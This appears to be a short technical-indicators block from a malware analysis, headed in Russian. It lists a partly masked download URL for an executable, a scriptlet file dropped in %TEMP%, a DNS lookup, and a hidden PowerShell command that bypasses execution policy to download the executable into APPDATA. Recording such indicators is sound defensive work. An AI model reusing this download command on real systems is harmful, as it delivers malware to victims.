Техническая информация
- http://ao####region.org.za/demo/cil/ori/navalb.exe как %appdata%\navalb.exe
- %TEMP%\abctfhghgdghgh‹.sct
- http://ao####region.org.za/demo/cil/ori/NAVALB.exe
- DNS ASK ao####region.org.za
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://ao####region.org.za/demo/cil/ori/NAVALB.exe','%APPDATA%\NAVALB.exe');S...' (со скрытым окном)